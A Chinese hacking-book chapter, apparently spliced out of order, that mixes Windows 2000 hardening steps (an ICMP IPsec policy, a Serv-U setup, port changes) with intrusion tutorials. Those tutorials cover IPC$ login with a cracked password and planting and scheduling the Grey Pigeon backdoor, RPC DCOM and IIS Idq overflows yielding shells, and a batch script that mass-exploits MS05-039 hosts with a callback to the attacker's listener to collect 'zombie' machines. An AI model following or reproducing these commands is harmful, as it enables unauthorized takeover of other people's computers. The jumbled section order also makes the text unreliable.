利用系统自身的缺陷,进行各种入侵向来就是黑客常得手的重要途径,特别是对于防范意识较差的用户来说更容易让黑客得手。如果你是一位了解计算机网络知识的读者,想必一定知道Ping命令,是网管们常常用来检查网络是否畅通的命令,可是这个命令也能给Windows系统带来严重的后果,那就是Ping入侵即ICMP攻击。 本文以Windows 2000操作系统为例,利用其自身的IP策略来阻止ICMP攻击。这里首先依次单击“开始”→“运行”选项,在弹出的“运行“对话框内,输入“MMC”命令回车,此时就会弹出“控制台”对话框(图1)。
图1 弹出控制台对话框
然后我们单击“控制台”标签,选择里面“添加/删除管理单元”选项,从中我们添加一个“IP安全策略管理”规则到控制台(图2)。
图2 选择IP安全策略管理选项
接下来如果你想创建IP安全策略,请在“控制台”对话框内,右击所添加的“IP安全策略管理”标签,选择里面“创建IP安全策略”选项,这样就可进入到创建IP安全策略规则的向导对话框内(图3)(图4)。
图3 创建IP安全策略
图4 进入到IP安全策略向导对话框可以从界面内,清楚的看见里面有个OK的用户,同时也证明了我们所拥有的权限是管理员权限。接下来在光标闪烁的位置处,输入“Copy C:11.exe(本机配置的后门木马) \\172.16.210.240\admin$”命令回车,此时就会将本机木马11.exe上传到目标主机的admin共享目录下(图27)。小提示:一般目标主机都会开放admin的共享目录,所以我们通常只要将木马上传到受害主机的admin目录内即可。当然如果管理员处于防范的心理,将admin目录关闭,而开放其他目录,你可以通过“net view \\目标IP”的命令,来查看对方共享。
图27 将本机后门木马上传到目标主机的admin目录内
接下来为了使木马运行,我们需要定制计划任务让其上传的木马运行,不过由于目标主机的当前系统时间我们不知道的因素,所以这里需在光标闪烁处,输入“net time \\172.16.21.240”命令,查看一下当前目标主机的系统时间(图28)。
图28 查看目标主机的当前时间
查看到目标主机当前的系统时间,为下午09:14,那么我们定制的计划木马运行时间,就要比其目标系统主机时间晚几分钟,甚至时间更长。这里在光标闪烁的位置处,输入“at \\172.16.210.240 21:17 11.exe”的执行命令回车,这样上传到目标主机的11.exe木马就会在当天的下午9点17分运行,换句话说过两分钟运行木马(图29)。
图29 设定计划任务使其上传的木马运行
两分钟过后,灰鸽子木马果然自动运行了,此时笔者查看了一下灰鸽子客户端程序,发现多出了一台肉鸡,其所显示的IP地址正是刚刚入侵的172.16.210.240,这样我们以后想操控其肉鸡时,无需再对其进行入侵,便可通过灰鸽子直接遥控了。7.1.4 Serv-U究极安全配置
众所周知,Serv-U FTP Server 是构建自己强力FTP服务器的一种软件,它能够帮助网管以最快的速度架设FTP服务器。也许是树大招风的原因,随着Serv-U FTP Server软件使用人数逐步增多的因素,黑客将攻击目标锁定到了该软件身上,使其频频告急并不断涌现出,一些能够致命的漏洞。因此笔者为了正在使用或者想用该软件网管的着想,特此写下Serv-U究极防御的安全配置篇,来防止黑客肆无忌惮的入侵。
Serv-U FTP Server软件的安装过程
首先是安装Serv-U FTP Server软件,这里笔者建议使用v6以上版本,这样可以自动减去一些底版本的致命漏洞。在网上下载完Serv-U FTP Server软件后,双击其安装程序,在弹出的“安装向导”对话框内(图30)。
图30 弹出安装Serv-U FTP Server软件向导
勾选编辑“I have checked my Mcafee……”前的复选框,单击“Next(下一步)”按钮,进入到安装路径界面,其软件默认安装到C:\ProgramFiles\Serv-U目录下,这个 默认安装目录想必黑客也应该知道,所以我们单击“Browse(浏览)”按钮,在弹出“select Destination Directory”对话框内,将安装目录进行选择更改,更改的越复杂越好,然后单击“Ok”按钮确认(图31)。
图31 选择好安装路径
看看够复杂了吧,而后单击“Next(下一步)”按钮,在其界面内只勾选前两项复选框,来减少一些不必要的插件进行加载(图32)。
图32 只勾选前两个复选框选项接下来继续单击“Next(下一步)”按钮,在上方文本处将默认的Serv-U FTP Server,改成任意的字母词汇,这样其开始菜单组里的文件夹名字,也会发生相应的变化(图33)。
图33 更改上方默认的Serv-U FTP Server文本
操作完毕后,一路单击“Next(下一步)”按钮,便可对其默认的Serv-U FTP Server软件进行安装,当安装完成后,它会出现一个向导让你建立一个域和账号(图34)。
图34 要求建立一个域和账号
这里单击“Cancel”按钮取消向导,而后在将桌面和开始菜单上,生成的该程序快捷方式删除。由于该软件是英文版的,所以网管在观看时会有障碍,这里请在Serv-U目录内,运行“汉化补丁”程序,此时就会弹出“汉化向导”对话框(图35)。
图35 弹出汉化向导对话框
从中单击“下一步”按钮,进入到“选择目标位置”界面,这里我们单击“浏览”按钮,将其定位到Serv-U FTP Server软件的安装目录(图36)。
图36 将其位置定位到Serv-U FTP Server软件的安装目录
而后便可一路单击“下一步”按钮,直接安装完相关的汉化插件结束。
小提示:如果你下载的Serv-U软件包,并没有附带该汉化程序,你可以自行去网上下载其汉化包即可。教你安全设置Serv-U FTP Server软件
虽然以上我们在安装Serv-U FTP Server软件时,做了简单的安全配置,但是面对来势凶猛的黑客,这些防御只是微不足道的,所以我们需在Serv-U FTP Server软件设置上下“功夫”。
这里打开“Serv-U FTP Server软件”界面,如果此时你想对软件密码进行设置,请依次选择左侧“Serv-U服务器”→“”选项,然后在右侧勾选“自动开始”复选框后,单击“设置/更改密码”按钮,在弹出“设置或更改管理员密码”对话框内,就可为其设置一个复杂的管理员密码(图37)。
图37 设置管理员密码
由于笔者之前没有对Serv-U设置密码,所以原来的密码就为空,然后在其下方输入自己想要设置的密码,单击“确定”按钮,便可使其设置的密码生效。另外为了安全起见,我们还需为Serv-U建立一个单独的管理账号,这里在桌面依次单击“开始”→“管理工具”→“Internet服务管理器”选项,在弹出的“计算机管理”对话框内,依次展开左侧到“计算机管理”→“本地用户和组”→“用户”选项处,从中新建立一个名为hack6用户,切记其密码一定要复杂免得被他人破解(图38)。
图38 建立管理员账号
然后勾选“用户不能更改密码”和“密码永不过期”前的复选框后,单击“创建”按钮,便可立即创建一个名为hack6的用户。接着在“计算机管理”对话框,右侧找到并且右击该用户,选择“属性”选项(图39)。
图39 右击刚刚创建的hack6用户此时就会弹出“hack6属性”对话框,从中切入至上方“隶属于”标签,选择里面的“Users”用户组,单击“删除”按钮,在点击“确定”使其生效便可(图40)。
图40 选择Users用组将其删除
这样hack6账号就已经创建完毕了,不过要想将其应用到Serv-U服务器内,我们在桌面依次单击“开始”→“管理工具”→“服务”选项,在弹出的“服务”对话框内,找到并且双击“Serv-U FTP 服务器”名称,此时就会弹出“Serv-U FTP 服务器的属性”对话框(图41)。
图41 弹出Serv-U FTP 服务器的属性对话框
从中切入至上方“登录”标签,选中下方“此账号”的单选框,单击“浏览”按钮,在弹出的“选择用户”对话框内,选择刚才建立的“hack6”用户,单击“确定”按钮,就可将其载入到此账户文本内,接着在其密码处输入相关密码,单击“确定”按钮完成服务设置(图42)。
图42 将刚才建立的账号hack6加载到Serv-U FTP 服务器内
接下来打开“运行”对话框,在其文本内输入“regedit32”命令回车,便可打开“注册表编辑器”对话框。然后将其左侧组件依次展开到“HKEY_LOCAL_MACHINE\SOFTWARE\Cat Soft”分支下,并将其分支选中(图43)。
图43 将组件展开到Cat Soft分支下接着单击上方“安全”菜单,选择里面的“权限”选项,这时就会弹出“Cat Soft的权限”对话框,我们将其里面的用户名称全部删除,在单击“添加”按钮,将刚才建立的hack6添加进来,而后勾选其允许栏里的“读取”、“完全控制”选项,并单击“确定”按钮,让其拥有足够的权限来进行管理(图44)。
图44 添加Hack6用户
除此之外,安装目录的权限也需要仔细设置,以免恶意人通过其他用户进行访问。由于笔者将Serv-U FTP Server安装到D盘,所以这里我们进入盘符为D盘,而后从中找到并且右击Serv-U FTP Server安装目录,选择“属性”选项,在弹出的“属性”对话框内,切入至“安全”标签(图45)。
图45 弹出安装目录的属性对话框
我们将里面System用户删除,以防止黑客通过这个系统超级用户来访问安装目录,进行肆意破坏。等到删除完毕后,单击“添加”按钮,从中找到并加入的hack6用户,然后给予其用户除完全控制外的所有权限,单击“确定”按钮使其设置生效(图46)。
图46 给安装目录加入hack6用户
这样黑客在不知道hack6用户密码时,要想从安装目录里找到想要的重要数据是不可能的,不过为了防止恶意人通过FTP用户进行做乱,我们需要对其内部用户进行权限设置,笔者这里的FTP服务器路径是e:\web,那么我们就在E盘根目录处,找到并且右击“web”文件夹,选择“属性”选项,在弹出的“属性”对话框内,切入至上方“安全”标签(图47)。
图47 切入至安全标签查看用户除了管理员用户及IIS用户留下,这里的IIS用户为1234,其他用户都删除掉,然后单击“添加”按钮,按照上方的操作将hack6载入,并且为其赋予其管理的所有权限,包括完全控制权限,单击“确定”按钮便可将其添加成功(图48)。
图48 将添加的hack6加入到Web目录内
然后还没有完,得在WEB目录所在盘的根目录处,这里也就是D盘根目录下的空白处右击,选择“属性”选项,从中切入至“安全”标签,同上添加hack6用户,并且让其“拥有读取及运行”、“列出文件夹目录”、“读取”的权限(图49)。
图49 在D盘根目录内加入hack6用户
接下来在单击“高级”按钮,在弹出的“Games(E:)的访问控制”对话框内,选择“hack6”栏目横条,单击“查看/编辑”按钮,此时就会显示“E盘关于hack6的权限设置”对话框。我们将“应用到”列表,选择成“只有该文件夹”选项,单击“确定”按钮,使其生效即可(图50)。
图50 将应用到列表选择成只有该文件夹选项
最后还需要我们进行测试,这里打开“Serv-U FTP Server”界面,从中单击“开始服务器”按钮,在弹出的“要求输入密码”对话框内,输入事先设置好的密码后,单击“确定”按钮便可进行登录。然后展开左侧“本地服务器”标签,双击其下的“域”选项,此时就会弹出“建立域”的向导对话框(图51)。
图51 弹出建立域的向导对话框从中选择自己当前主机在内网的IP地址,这里笔者主机所在内网的地址为192.168.1.6,将其选择完毕后,单击“下一步”按钮,进入到添加域的第二步操作。而后在其文本处输入想要建立域的地址如ftp.hack6.com,输入完毕后,一路单击“下一步”按钮,到新建域的第四步(图52)。
图52 选择域类型
将里面“域类型”列表选择为“存储于计算机注册表”选项后,单击“下一步”按钮完成。接下来建立用户,这里双击左侧“用户”标签,在弹出的“新建用户”向导对话框内,将想要建立的用户输入进去,例如输入“123”,单击“下一步”按钮(图53)。
图53 添加新用户名称
接着进入第二步操作,它会要求我们输入密码,你可以随便输入,不过一定要记住了,然后在单击“下一步”按钮,在第三步文本内,单击后面“浏览”按钮,指定FTP服务器所在目录,这里为E:\web目录(图54)。
图54 指定FTP服务器主目录
然后单击“下一步”按钮,此时你在“第四步操作”的对话框内,就会看到“是否锁定用户于主目录”的询问信息,我们为了使用户只看到“\”目录为他们的主目录,请选择“是”单选框,而后单击“完成”按钮便可执行(图55)。
图55 询问是否锁定用户于主目录操作完毕后,此时顺原路返回到“Serv-U FTP Server软件”界面,并且在其右侧切入的是上方“目录访问”标签,我们从中勾选“读取、写入、追加、删除、列表、创建、删除、继承”前的复选框,单击“应用”按钮使其生效,从而让该用户拥有你所勾选的功能(图56)。
图56 123用户的目录访问界面
这样一个安全的FTP服务器,就设置完毕了,以后要想往其服务器上传入文件,可以用Flashfxp软件对其FTP服务器进行连接,即可轻松载入你想要的程序文件。
7.1.5让初级黑客对您电脑扫描无用武之地
通常黑客要想入侵一台主机,首先都会对其目标主机进行扫描踩点,然后在得到端口,及其主机开放的服务信息后,才会执行相关的入侵方案。因此这里我们让其黑客的扫描踩点失去效用,也就阻止了黑客的入侵,具体操作请看下文所示。
众所周知,黑客扫描一台主机,首先会对其3389端口进行检测,其原因很简单3389端口是Windows 2000(2003) Server 远程桌面的服务端口,如果开放其恶意人就可用“远程桌面”等连接工具来连接到远程的服务器,如果连接上了,输入系统管理员的用户名和密码后,将变得可以像操作本机一样操作远程电脑,那后果将是不堪设想的。所以我们需修改注册表其相关数值,就可将3389端口关闭。
这里打开“运行”对话框,从中输入“Regedit”命令回车,便可启动“注册表”编辑器。然后在其编辑器界面内,依次展开左侧组件到HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\Rdpwd\Tds项目下,接着在右侧所显示的键值内,找到并且双击“PortNumber”标签(图57)。
图57 将注册表组件展开到3389相关项处
此时在所弹出的“编辑Dword值”对话框内,将默认选择的“十六进制”单选框,更改成“十进制”单选框后,为了掩人耳目我们将其3389端口,修改成任意的与其他端口不发生冲突的端口,例如9782,单击“确定”按钮使其设置生效(图58)。
图58 修改3389端口为9782
接下来继续展开注册表组件到“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\Rdpwd\Tds\tcp”项目下,同样按照上面的方法,在右侧找到并且双击“PortNumber”标签,将里面的十进制数值更改成9782使其生效后,此时该主机的远程服务终端的端口号,就会由原来的3389更改成9782端口,这样当黑客在对主机的3389端口扫描时,就会出现其端口关闭的情况,从而给其黑客造成一个终端服务关闭的假象。而我们以后要想远程连接该主机,只要在3389远程连接工具内,将连接该主机的IP填入后,在其后面加上“:9782”,便可成功连接该主机终端(图59)。
图59 在连接IP地址后面加上冒号及修改的远程终端号黑客除了针对3389端口扫描外,还会针对一些其他危险的端口进行检测,以下笔者将会针对一些比较常见的危险端口做一下修改。这里假设你架设了FTP服务器,其系统就会默认开放21端口,与其网络进行文件传输。因此黑客一旦嗅觉其端口的存在,它就会想法设法针对FTP展开猛烈攻击,所以为了隐藏FTP服务的存在,我可以将端口进行更改。 这里依次双击“控制面板”→“管理工具”→“Internet信息服务”选项,在弹出的“Internet信息服务”对话框内(图60)。
图60 打开Internet信息服务对话框
右击左侧“默认FTP站点”标签,选择“属性”选项,此时就会弹出“FTP站点属性”对话框,默认切入至上方“FTP站点”标签(图61)。
图61 弹出的FTP站点属性对话框
如果你要想修改FTP通讯的21端口,只要在其对话框内,将TCP端口里的21数字,更改成你想要的FTP通讯端口数便可。除此之外WEB站点的80端口,也可同样做相关修改,这里右击左侧“默认Web站点”标签,选择“属性”选项,在弹出的“默认Web站点属性”对话框内,只要将里面的TCP文本80端口,更改成你想要的端口后,单击“确定”按钮,便可同样将其WEB站点的通讯端口进行更改(图62)。
图62 弹出的默认Web站点属性对话框
其他服务的修改端口方法均大同小异,这里就不做过多讲解了。如果你使用的FTP不是系统自带的工具,而是FTP服务的Serv-u管理软件,可在其界面左侧依次展开“Serv-u服务器”→“本地服务器”→“域”选项,然后选中自己新建的FTP服务器(图63)。
图63 选中自己建立的FTP服务器
在右侧将FTP端口号里的21,更改成自己的想要通讯的FTP端口,即可单击下面“应用”按钮,使其更改的端口号生效。在经过对以上危险的端口修改后,相信黑客在对主机扫描时,将无法得到任何有价值的信息,即使得到我们所更改的端口号,它也无从分辨此端口开放代表系统哪个服务,所以攻击也就无法实施了。这里在“名称”标签的文本处,输入“ping”字母后,一路单击“下一步”按钮,到“默认响应规则身份验证方式”界面,从中选择“此字串用来保护密钥交换(预共享密钥)”的单选框后,在其文本处输入“123”数字,这样其安全规则身份验证方式,就会以字串来保护密钥交换了,而后单击“下一步”按钮直到完成结束(图5)。
图5 选择此字串用来保护密钥交换(预共享密钥)的单选框
操作完毕后,在以上所创建的“Ping属性”对话框内,单击“添加”按钮,在弹出的“安全规则”向导对话框里,继续一路单击“下一步”按钮到“身份验证方法”界面,从中再次选中“此字串用来保护密钥交换(预共享密钥)”的单选框,并且在其文本处输入“123”数字,单击“下一步”按钮,就可进入到“IP筛选器列表”界面(图6)。
图6 进入到IP筛选器界面
单击“添加”按钮,在弹出的“IP筛选器列表”对话框内,将名称更改成ping后,再次单击“添加”按钮,此时在所弹出的“筛选器向导”对话框内,一路单击“下一步”按钮到“IP协议类型”界面,将选择协议类型设置为你想要阻挡的“ICMP”攻击协议(图7)。
图7 选择ICMP协议列表7.1.6RPC DCOM溢出漏洞攻击
Remote Procedure Call (RPC)是Windows操作系统使用的一种远程调用协议,并且它提供了进程间交互通信机制,允许在某台计算机上运行程序,且在远程系统上执行相关代码。但是在提供方便的同时,RPC在处理畸形消息时却存在问题,远程攻击者可以利用这个漏洞进行拒绝服务攻击,从而等到系统崩溃后将自己权限进行提升,来控制其受害主机。
一般开放135端口的主机,几乎都会有该漏洞的存在,因此这里我为了确定攻击的目标,笔者拿出“Superscan”扫描工具,在其IP的起与结束处输入想要扫描的IP段,然后勾选“端口范围”单选框,并且在其后面输入135,单击“开始扫描”按钮后,即可进行检测(图64)。
图64 检测到所开放的135主机
稍等片刻后,就会检测到很多台开放135端口的主机,我们从中随便挑选一台,进行溢出攻击便可。这里扫到的218.0.173.5的主机IP地址为例,打开“运行”对话框,在其文本内输入“CMD”命令回车,此时就会打开“命令提示”对话框(图65)。
图65 打开命令提示对话框
我们将其默认的C盘目录,跳转并且进入到RPC溢出工具所在目录,然后在光标闪烁处输入“Dcomrpc 1 218.0.173.5”命令后回车,如果溢出成功,此时的目录就会自动跳转到System32下(图66)。
图66 溢出成功后得到受害主机的Shell
这样我们就已经拥有了对方的Shell,而且其身份还是管理员权限,可以任由我们自己在其后台上,做修改、删除文件等操作。7.1.7 Idq漏洞攻击教程
风光了很久的Idq漏洞是经常被入侵者利用的漏洞之一,记得在中美黑客大战中,黑客们普遍利用该漏洞,入侵到对方的主机实施攻击。如今这种经典的漏洞,掐指一算“风头”已经过去5年了,不过笔者发现还是有很多主机存在该危险漏洞,以下就是关于其漏洞的入侵方法。
由于你可能不知道某台主机是否存在Idq漏洞,我们可以利用Xsan或者流光扫描器,对其
主机做/null.idq检测,如果发现有此结果出现,就代表它存在Idq漏洞。关于Xsan或者流光扫描器的使用,已经在前几节介绍过了,因此就不多加讲解了,这里笔者已经扫描到了一个存在Idq漏洞的主机。
于是打开Snake IIS溢出工具,在其界面的被攻击地址处,输入存在Idq漏洞IP地址,其后面端口为80,然后根据情况在“操作系统类型”列表内,选择与受害主机相对应的系统,并选中“右侧溢出后,在一个端口监听”的单选框后,从中输入想要监听的端口(图67)。
图67 对目标主机实施溢出
当shellcode发送成功后,我依次单击“开始”→“运行”选项,在弹出的“运行”对话框内,输入“Telnet 202.39.49.23(溢出目标主机的IP) 813(监听端口)”命令后回车。如果成功稍等片刻后,就会Telnet到对方主机的Shell平台(图68)。
图68 成功登陆到对方主机的shell平台
小提示: Telnet服务是本地计算机与远程计算机,进行连接通讯的一种终端服务,用户通过本地计算机登陆到远程计算机后,所拥有的身份为系统管理员权限。
利用Telnet命令登录到目标主机后,此时的你已经可以为所欲为的对其主机进行控制,比如做删除文件、修改文件、上传下载木马等操作,可见Idq漏洞一旦溢出成功,后果真实不堪设想。7.1.8批量溢出Ms05039漏洞主机
肉鸡是黑客新手成长的一个练手平台,但是对于刚接触黑客的新手来说,要想抓取肉鸡并非容易,一般他们都是通过找师傅给肉鸡的途径才能获取。那么难道黑客新手,真的只能通过师傅施舍肉鸡来获取吗?答案当然不是,以下笔者针对初级黑客量身订做了一套抓取肉鸡的方法,具体操作请看下文所示。
俗话说的好:“工欲善其事,必先利其器”,首先我们在操作之前,需要从网上下载s.exe扫描器和nc瑞士军刀监听、Ms05039漏洞溢出工具,然后在命令行下,将默认目录跳转到下载的s.exe扫描器目录处。
由于我们不知道哪台主机存在Ms05039漏洞,所以这里从中输入s tcp 218.1.0.0 218.1.128.255 445(端口) 120(线程,可以根据网络好坏调整大小) /save命令回车,便可对其218.1.0.0--218.1.128.255段的主机进行扫描,如果你想扫描其他主机段,只要将其IP段进行替换,其他保持原样即可。稍等片刻后,扫描结果会生成在S扫描器目录下的Result.txt内(图69)。
图69 扫描结果显示
小提示:以上命令参数Tcp,为本次扫描的方式是Tcp形式。而后其面的218.1.0.0 218.1.128.255为扫描的IP段,445为扫描端口,120为线程这个可以根据自己实际网速来定。
接下来打开“CMD命令”对话框,如果此时的目录并非Nc工具所在的目录,请将其默认目录跳转到NC工具目录下。然后从中输入“nc -l -vv –p 想要监听的端口”命令回车,对其本地某端口执行监听。当然你也可以像笔者一样,在一个Bat的批处理文件中,输入监听命令,然后执行其Bat批处理文件,同样可以达到监听本机端口的效果(图70)。
图70 利用Nc瑞士军刀对本机1984端口进行监听
执行完以上监听后,为了方便自己的溢出,笔者在存有S扫描工具、Ms05039漏洞目录内,新建了一个记事本文档,然后在其文档内部,输入如下溢出命令:@for /f %%i in (result.txt) do ms05039 %%i 219.128.81.93 1984,接着将其保存为.Bat形式的批处理文件即可。操作完毕后,另外打开一个“CMD命令”窗口,从中运行其批处理文件,此时就可对其所扫到445主机,进行批量溢出,从而得到Shell,自行做上传木马、建立用户等任意操作(图71)。
图71 自动对result.txt文本内的主机进行批量溢出
小提示:result.txt是我们之前所扫描到可用漏洞的主机群体,219.128.81.93则是自己的IP地址,1984是本机所监听的端口号。而后继续单击“下一步”按钮直到完成,顺原路返回到“IP筛选器列表”对话框,然后开始开始设置防御ICMP攻击的策略,这里再次单击“添加”按钮,在弹出的“安全规则向导”对话框内,选择“Ping”单选框后,单击“下一步”按钮,在“筛选器操作”界面内,选中“要求安全设置”的单选框(图8)。
图8 选中要求安全设置单选框
接下来单击“下一步”按钮,去掉“编辑属性”复选框上的勾后,单击“完成”按钮,即可将ICMP的防御策略设置成功,最后我们还需指派设置好的ICMP防御策略(图9)。
图9 指派ping策略
这里在“控制台”对话框内,右击其创建成功的ping策略,选择“指派”选项,使其ICMP防御策略应用,从而本机以后就可具备防止ICMP数据包攻击的功能了。7.1.2系统漏洞扫描器的使用操作
如果我们将电脑比作一个大楼,那么主机入侵信息收集及分析,就如同大楼中部署若干个摄像头,在大楼发生盗窃事件之后,对摄像头中的影像进行分析,进而为报案和“亡羊补牢”做准备。因此扫描工具及其技能,是黑客们及其网管必备的工具,及必须掌握的攻\防方法之一。
稳定性极强的流光扫描器
以下笔者将会针对网络上最常用的流光、X-SCAN扫描工具,做以详细的讲解。首先是流光扫描软件,它是国内最早的专业扫描软件,其功能强大、扫描速度快、可靠性强的三个特点,深受广大黑迷的喜爱。这里打开“流光”扫描界面,印入眼帘的是左侧扫描主界面, 如果你想对某主机进行扫描的话,请在相关的目标主机类型处,进行添加想要扫描的目标,例如这里想对http主机进行扫描(图10)。
图10 添加想要扫描的Http主机
我们在目标主机的Http主机上方右击,依次选择“编辑”→“添加”选项,在弹出的“添加主机(Http)”对话框内,输入想要检测主机的域名地址,例如在其文本处输入www.hacker.com.cn后,单击“确定”按钮,便可将其添加的主机地址载入到扫描界面内(图11)(图12)。
图11 添加Http主机
图12 将想要扫描的主机载入到界面然后从中将载入的主机,以及Http主机的栏勾选上后,右击载入想要检测的主机,在弹出的快捷菜单内,单击“探测”选项,可以选择对主机开放的端口进行检测,还是对主机类型,以及其用户信息进行扫描,这里以检测主机开放端口为例,选择“扫描主机端口”选项,此时就会弹出“端口探测设置”对话框,从中设置好想要探测开放端口的范围(图13)。
图13 设置想要扫描的端口范围
设置完毕后,单击“确定”按钮,此时就会立即对其主机进行端口扫描,稍等片刻后,便可弹出“扫描结果”给予用户提示(图14)。
图14 正在对主机进行端口扫描
图15 探测到所开放的系统端口从以上图中,我们得知目标主机开放了80和21端口,了解了这一切后,单击“确定”按钮将其关闭。接下来如果你不满足仅仅只对端口进行检测,还想对主机进行综合扫描的话,请依次单击上方“探测”→“高级扫描工具”选项,此时就会弹出“高级扫描设置”的对话框(图16)。
图16 打开高级扫描设置对话框
在“高级扫描设置”对话框内,可以设置对一个IP段进行扫描检测,不过这里要注意的是扫描的主机数量,最好不要超过35台主机。然后在下面“检测项目”栏内,去掉一些不需要扫描的项目前的勾,以节省我们扫描检测的时间,最后单击“确定”按钮,便可按照设置对其IP段进行相关检测了。功能强大的Xscan扫描工具
大名鼎鼎的Xscan工具,是即流光之后的第二款著名扫描工具,其Xscan工具特点,不仅继承了流光超强的稳定性,而且它还支持多重系统漏洞的扫描,扩展性极强是一款非常不错的检测工具。
打开“Xscan”扫描界面,从中单击上方“扫描参数”按钮,在弹出的“扫描参数”对话框内,将指定IP范围内,输入想要扫描的目标主机IP,或者是域名地址(图17)。
图17 输入想要扫描域名地址
然后依次选择左侧“全局设置”→“扫描模块”选项,在其右侧勾选想要扫描的“项目”复选框(图18)。
图18 勾选上想要扫描的项目复选框
其他选项保持默认设置后,单击“确定”按钮,就可将想要扫描的目标锁定了,然后单击界面里的“开始扫描”按钮,此时就可根据我们之前设置的扫描项目,进行逐一检测了(图19)。
图19 正在对锁定的目标主机进行检测
其结果会显示在右下方栏内,如果此时你已经找到了自己想要的信息,可以单击“暂停扫描”或者“终止扫描”按钮,停止以下的相关项目扫描,从而为自己节省一些检测时间。7.1.3IPC$漏洞入侵
IPC$漏洞入侵,已经成为网络黑客入侵系统的经典模式,尽管WindowsXP和Windows2003对于IPC的连接进行了极好的改进,但是Windows 2000系统一般架设的都是服务器,所以为了传输方便,管理员不会对其IPC做任何限制,因此IPC$漏洞的入侵得手率还是很高,这里笔者将会针对IPC$漏洞,其入侵方法做以详细讲解。
小提示:IPC是Internet Process Connection的缩写,IPC$是共享“命名管道”的资源,它对于程序间的通信很重要,一般网管在远程管理和查看计算机的共享资源时,会经常通过此服务来进行查看。
由于网上不是每台主机都会存在IPC,以及NT空口令漏洞,所以这里我们需要打开“Xscan”扫描界面,单击“扫描参数”按钮,在弹出“扫描参数”对话框内,默认选择的是左侧“检测范围”标签,我们在其右侧输入想要检测的IP段(图20)。
图20 输入想要检测的IP段
操作完毕后,依次选择左侧“全局设置”→“扫描模块”选项,而后在其右侧勾选“NT-Server弱口令”前复选框后,单击“确定”按钮使其设置生效(图21)。
图21 勾选NT-Server弱口令和Netbios信息前的复选框
接着会顺“原路”返回到软件界面,从中单击“开始扫描”按钮,此时便可对设置的IP段进行扫描。稍等片刻,就会在扫描软件的同一目录下,生成扫描结果的Html页面,我们将其打开后,其安全漏洞栏就会显示出其系统存在的漏洞(图22)。
图22 显示出所检测到的系统漏洞
从以上图内,可以看到漏洞栏里的端口/服务是Netbios-ss,其实这个就是IPC$共享服务漏洞,而其后面所显示的口令,则是检测到其主机的管理员口令和密码。现在已万事俱备,只欠东风的时候,而其东风就是我们入侵主机的操作。不过在入侵之前,我们需要配置好自己的后台木马,以便自己下次无需入侵,就可直接遥控主机。这里以灰鸽子木马为例,打开“灰鸽子客户端”界面,单击上方“配置服务程序”按钮,在弹出的“服务器配置”对话框内,默认切入的是“自动上线设置”标签,我们在其下方“IP通知Http访问地址、DNS解析域名或固定IP”内,将自己本机IP填入(图23)。
图23 填入本机固定的IP地址
其他设置保持默认即可,而后单击“生成服务器”按钮,并且选择生成路径,便可立即成功生成灰鸽子服务端程序。这里笔者为了便于大家的记忆,将其生成好的服务端程序名称更改成11.exe,然后依次单击“开始”→“运行”选项,在弹出的“运行”对话框内,输入“CMD”命令回车,此时便可弹出“CMD命令提示”对话框(图24)。
图24 打开系统自带的CMD命令窗口
接着在光标闪烁处,输入“cd \”命令回车,将当前目录切换到C盘根目录下,而后输入net use \\172.16.210.240(目标主机IP地址)\ipc$ “123(目标主机上的管理员密码)” /user:“administrator(管理员账号)”回车,便可与目标主机成功建立空连接(图25)。
图25 与目标主机建立空连接
而后在光标闪烁的位置处,输入“net user”命令回车,查看一下目标主机当前的用户列表(图26)。
图26 查看远程目标主机用户列表